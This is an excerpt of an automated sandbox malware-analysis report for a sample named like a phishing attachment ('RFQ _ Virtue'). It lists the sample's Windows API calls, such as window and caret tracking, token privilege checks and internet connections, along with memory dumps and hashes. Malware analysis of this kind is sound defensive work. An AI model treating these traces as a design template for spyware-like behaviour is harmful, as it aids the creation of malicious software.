                                                                                • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                                • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00484F02
                                                                                  • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                  • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                  • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                                • GetCaretPos.USER32(?), ref: 00484F13
                                                                                • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                                • GetForegroundWindow.USER32 ref: 00484F54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                                • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                                • GetCursorPos.USER32(?), ref: 0048C534
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                                • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                                APIs
                                                                                  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                  • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                  • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                  • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                                • _memcmp.LIBCMT ref: 004586C6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                                • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                • String ID:
                                                                                • API String ID: 1592001646-0
                                                                                • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                                • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                                APIs
                                                                                • __setmode.LIBCMT ref: 004209AE
                                                                                  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                • _fprintf.LIBCMT ref: 004209E5
                                                                                • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                  • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                                • __setmode.LIBCMT ref: 00420A1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                • String ID:
                                                                                • API String ID: 521402451-0
                                                                                • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                                • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                                                                                  • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                  • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                                                                                • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00435101
                                                                                  • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                  • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                  • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                                • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                                APIs
                                                                                  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                                • _memmove.LIBCMT ref: 004763D1
                                                                                • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                • String ID:
                                                                                • API String ID: 1504782959-0
                                                                                • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                                • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                                • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                                • GetCursorPos.USER32(?), ref: 0043B605
                                                                                • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 4127811313-0
                                                                                • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                                • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                • Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                                                                • Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
                                                                                • Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                                                                • Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                • String ID:
                                                                                • API String ID: 357397906-0
                                                                                • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                  • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                • _memmove.LIBCMT ref: 00466C09
                                                                                • _memset.LIBCMT ref: 00466C16
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                • String ID:
                                                                                • API String ID: 48991266-0
